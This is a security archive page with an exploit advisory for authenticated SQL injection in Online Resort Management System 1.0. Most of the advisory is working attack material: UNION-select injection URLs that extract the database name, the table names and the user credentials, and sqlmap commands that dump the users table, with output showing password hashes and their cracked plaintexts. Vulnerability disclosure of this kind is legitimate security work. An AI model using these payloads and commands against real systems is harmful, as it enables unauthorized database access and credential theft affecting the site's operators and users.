Online Resort Management System 1.0 SQL Injection

Online Resort Management System 1.0 SQL Injection: Posted Jan 18, 2022; Authored by Gaurav Grover; Online Resort Management System version 1.0 suffer from remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty on January 10, 2022.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | f901ac18d938c659dcced1597954fd5ccffb4c0483b3801ffa54b94294b3451b; Download | Favorite | View

Online Resort Management System 1.0 SQL Injection

# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)
# Date: 15/01/2022
# Exploit Author: Gaurav Grover
# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>
# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>
# Version: 1.0
# Tested on: Linux and windows both

Summary:

There are a vulnerabilities in Online Resort Management System (ORMS)
1. The attacker can easily retrieved the database using sql injection.

Proof of concepts :


Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:

1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=


2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+


3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+


4. (Database Name :- orms_db)

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+


5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+


6. (Username Password :-  User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+


-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:



1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs

available databases [8]:

[*] clinic_db
[*] information_schema
[*] mtms_db
[*] mysql
[*] orms_db
[*] performance_schema
[*] phpmyadmin
[*] test


2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables

Database: mtms
[6 tables]
+------------------+
| activity_list    |
| message_list     |
| reservation_list |
| room_list        |
| system_info      |
| users            |
+------------------+



3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump

Database: orms_db
Table: users
[2 entries]
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| id | type | status | avatar                            | username | lastname | password                                    | firstname    | middlename | last_login | date_added          | date_updated        |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| 1  | 1    | 1      | uploads/avatar-1.png?v=1639468007 | admin    | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL       | NULL       | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |
| 5  | 2    | 1      | uploads/avatar-5.png?v=1641622906 | cblake1  | Blake    | cd74fae0a3adf459f73bbf187607ccea (cblake)   | Claire       | NULL       | NULL       | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+

Top Authors In Last 30 Days

Red Hat 247 files
Jay Turla 150 files
indoushka 139 files
Ubuntu 61 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Online Resort Management System 1.0 SQL Injection

Online Resort Management System 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Resort Management System 1.0 SQL Injection

Share This

Online Resort Management System 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems